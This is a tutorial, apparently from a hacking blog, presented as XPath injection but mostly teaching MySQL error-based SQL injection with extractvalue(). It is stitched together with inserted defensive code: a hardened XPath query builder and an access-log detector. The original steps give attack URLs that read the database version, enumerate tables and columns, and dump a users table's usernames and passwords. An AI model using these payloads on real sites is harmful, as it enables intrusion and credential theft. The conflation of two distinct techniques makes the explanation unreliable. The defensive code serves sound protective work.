NOTE: ONLY FOR EDUCATIONAL PURPOSES. IT IS TOTALLY ILLEGAL AND YOU WILL BE PUNISHED. SO DON'T TRY.
XPath Injection: SQL injection is the most popular type of code injection attack, but there are several others that can be just as dangerous to your applications and your data, including LDAP injection and XPath injection. An ‘XPath injection’ attack is similar to an SQL injection attack, but its target is an XML document rather than an SQL database. ‘XPath injection’ is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
What is XML?
XML stands for Extensible Markup Language and was designed to describe data. It allows programmers to create their own customized tags to store data. In XML the data is stored in nodes in a tree form. XML Path or XPath language is used for querying information from the nodes of an XML document. Please refer to XML Tutorial for more details on XML.
What is XPath?
“XML Path” or “XPath” 1.0 is a language used to refer to parts of an XML document. Path expressions are used to access elements and attributes in an XML document, which return a node-set, a string, a Boolean or a number. It can be used directly to query an XML document by an application, or as part of a larger operation such as applying an XSLT transformation to an XML document, or applying an XQuery to an XML document. Please refer to XPath Tutorial for more details on XPath.
In Detail:
Code injection is a technique to inject code into a program or application by taking advantage of the unchecked assumptions the application makes about its inputs, in order to bypass or modify the originally intended functionality of the code. All code injection attacks work in the same way: an attacker injects malicious code into the application through an input field of the application. So, for such attacks to be possible there must be entry points that do not perform adequate validation.
Consider a Web application that uses XPath to query an XML document to retrieve the social security number of a customer by passing name and password values that are supplied by the user of the application. If the application embeds these values directly in the XPath query then it is vulnerable to XPath Injection.
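The scenario just described, as an added example that is not code from the original post: the query that embeds the name and password straight into the XPath expression, beside a hardened form that encodes each input as an XPath 1.0 string literal, with an allow-list check in front of it as defence in depth. The customer XML document, the SSN lookup and every function name here are constructed for this illustration; the query is only evaluated if lxml happens to be installed, since the standard-library ElementTree cannot evaluate `or` predicates.

```python
"""Vulnerable vs. hardened XPath query construction (constructed example)."""
import re

# Constructed sample document standing in for the application's data store.
CUSTOMERS_XML = """<customers>
  <customer><name>alice</name><password>s3cret</password><ssn>111-22-3333</ssn></customer>
  <customer><name>bob</name><password>hunter2</password><ssn>444-55-6666</ssn></customer>
</customers>"""


def build_query_vulnerable(name: str, password: str) -> str:
    """Embeds user input straight into the expression: a quote inside an
    input closes the literal and the remainder is parsed as XPath."""
    return f"//customer[name='{name}' and password='{password}']/ssn/text()"


def xpath_string_literal(value: str) -> str:
    """Encode any string as an XPath 1.0 string literal.  XPath 1.0 has no
    escape sequence inside literals, so a value containing both quote kinds
    is split into concat() of pieces that each use the other quote."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = []
    for chunk in value.split("'"):
        if chunk:
            parts.append(f"'{chunk}'")
        parts.append("\"'\"")  # the single quote that separated the chunks
    parts.pop()                # one quote piece too many after the last chunk
    return "concat(" + ", ".join(parts) + ")"


def build_query_safe(name: str, password: str) -> str:
    """Same lookup, but user input can only ever be a string value.  Where the
    XPath engine supports variables (lxml: xpath(expr, name=value)), binding
    is preferable to building literals at all."""
    return (f"//customer[name={xpath_string_literal(name)}"
            f" and password={xpath_string_literal(password)}]/ssn/text()")


# Hypothetical shape of a username in this application (assumption).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def is_valid_username(name: str) -> bool:
    """Defence in depth: an allow-list on the field's expected shape rejects
    the metacharacters an injection needs before any query is built."""
    return USERNAME_RE.fullmatch(name) is not None


def evaluate(query: str):
    """Run the query against the sample document when lxml is installed;
    returns None otherwise so the demo degrades gracefully."""
    try:
        from lxml import etree
    except ImportError:
        return None
    return [str(v) for v in etree.fromstring(CUSTOMERS_XML).xpath(query)]


if __name__ == "__main__":
    # The textbook tautology, supplied in both fields because 'and' binds
    # tighter than 'or' in XPath (in one field alone it would not bypass).
    payload = "' or '1'='1"
    for label, builder in (("vulnerable", build_query_vulnerable),
                           ("hardened", build_query_safe)):
        q = builder(payload, payload)
        print(f"{label}: {q}")
        print(f"  result: {evaluate(q)}")
    print("allow-list accepts 'alice':", is_valid_username("alice"))
    print("allow-list accepts payload:", is_valid_username(payload))
```

With lxml present, the vulnerable query returns every SSN in the document while the hardened one returns nothing, because the whole payload is compared as a plain string against the name element. Validating shape first and building literals second means a failure in either layer is still caught by the other.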
OK, so when to use it? Let us assume we have found a site that appears to be vulnerable from our usual quick tests, but when we try to inject using ORDER BY we get no errors generated. We double check using the string injection method to make sure that it is not the problem, but still no results. Time to give up? Never; let us now try to see if we might be able to use XPATH injection.
We will start with a quick check to confirm the version, to ensure this method can be used, as it only works on MySQL version >=5.1 (best with errors present). The first check for version and user looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--
RESULT: 'Xpath syntax error: version info:user info'
OK, so now we have confirmation that this method will work, as clearly displayed in the errors seen. We now have the version and current user info. Now we will move to checking the table info, like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
RESULT: 'Xpath syntax error: <Table Name Found at address used in LIMIT statement>'
This is the biggest problem with XPATH injection: it gets tricky here. You will need to use the LIMIT statement to sort your results and keep track of all of the table names found. This can be very time consuming, but it is key that you use your brain to pick up on any relationships that become obvious as you are sorting through tables, while also keeping an eye out for juicy tables that may warrant further investigation in future steps. I suggest first sorting them to find the lower and upper limits so you know what type of range you are working with (some sites will have only a few and others will have thousands in total; see the example below).
Once you have determined the table info, you will need to follow similar steps to pull the column details. It works very similarly to tables and looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 0,1)))--
RESULT: 'Xpath syntax error: <column name found at address used in LIMIT statement>'
This is just as time consuming as pulling the table names, and it is a bit tricky, as it becomes very hard to tell which columns belong to which tables, or which database for that matter. For this reason it is key to use your brain power to make some logical determinations about what you find. For example, you might deduce that you have found a table named mysql_auth_users and columns idx, username, and password; it would not be a great stretch to assume these go together. I tend to use a bit of trial and error on this last part, but have found that if you just think about it for a minute you can usually make the necessary connections to extract what you want. That being said, extraction of data works exactly the same as it does for simple SQLi: you choose the columns you want, indicate which table to pull from, and parse the results from the error given. It looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,idx,0x3a,username,0x3a,password) from mysql_auth_usr)))--
RESULT: Xpath syntax error: ':1:admin:password1'
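From the defender's side, the requests in the steps above have a distinctive shape that is easy to pick out of web-server logs, and the RESULT lines show a second signal: the application is echoing raw MySQL errors to the client. The following is an added example, not code from the original post: a small Python detector that flags the extractvalue()/updatexml() pattern in query parameters (with concat(), information_schema and a trailing SQL comment as supporting evidence) over constructed access-log lines, plus a check for the "XPATH syntax error" text in a response body. The log format, the IP addresses and the alert fields are assumptions of this example.

```python
"""Detect MySQL error-based injection via extractvalue()/updatexml() in
access logs, and verbose-error leakage in responses (constructed example)."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures of the technique: an XML function whose "XPATH syntax error"
# echoes its argument, fed by concat()/information_schema and usually closed
# with a SQL comment.
XML_FUNC = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
SUPPORT = re.compile(r"\bconcat\s*\(|information_schema|\b(version|user|database)\s*\(", re.I)
COMMENT = re.compile(r"--(\s|$)|#|/\*")
# Verbose error text seen in the post's RESULT lines; in a response body it
# means database errors are being disclosed to clients.
ERROR_LEAK = re.compile(r"XPATH syntax error", re.I)

# Common Log Format with the request line split out (assumed log format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def analyse_target(target: str) -> list:
    """Inspect every query parameter of a request target; returns
    (param, decoded_value, severity, reasons) for each suspicious one."""
    findings = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode catches double-encoded payloads
        if not XML_FUNC.search(value):
            continue                 # the XML function is the anchor of the technique
        reasons = ["mysql-xml-error-function"]
        if SUPPORT.search(value):
            reasons.append("concat-or-schema-enumeration")
        if COMMENT.search(value):
            reasons.append("trailing-sql-comment")
        severity = "high" if len(reasons) > 1 else "medium"
        findings.append((key, value, severity, reasons))
    return findings


def scan_log(lines) -> list:
    """Run analyse_target over access-log lines; one alert dict per suspicious
    parameter.  Lines that do not parse are skipped rather than trusted."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, value, severity, reasons in analyse_target(m["target"]):
            alerts.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                           "param": param, "severity": severity,
                           "reasons": reasons, "value": value})
    return alerts


def leaks_db_error(response_body: str) -> bool:
    """Server-side check: does a response echo the MySQL XPath error text?"""
    return ERROR_LEAK.search(response_body) is not None


# Constructed sample log lines (not real traffic).  Lines 2 and 3 follow the
# version/user and table-enumeration requests of the post; line 4 is a benign
# search that merely contains the word "extract".
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=1%20and%20extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--+ HTTP/1.1" 200 1180',
    '203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=1%20and%20updatexml(1,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20limit%200,1)),1)--+ HTTP/1.1" 200 1190',
    '198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /search.php?q=extract+value+from+pdf HTTP/1.1" 200 8420',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} param={alert['param']} "
              f"severity={alert['severity']} reasons={alert['reasons']}")
```

The detector anchors on the XML function because a numeric id parameter has no legitimate reason to carry one; the supporting patterns only raise severity, which keeps the benign "extract value" search out of the alerts. The remediation on the application side is the usual pair: parameterised queries for the id parameter, and error display turned off so the "XPATH syntax error" channel this technique depends on is closed.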
Now you have successfully injected and extracted the data using XPATH injection! Now go pat yourself on the back for learning a new method and enjoy a well-deserved break.
There are other XPATH queries that can be used, but this is the one I have found the best results with. You can also use updatexml(). I will continue to add to this as I investigate this technique more, but this concludes my write-up on XPATH injection using the EXTRACTVALUE() method for now. I hope you have found this interesting and educational and, as always, until next time, Enjoy!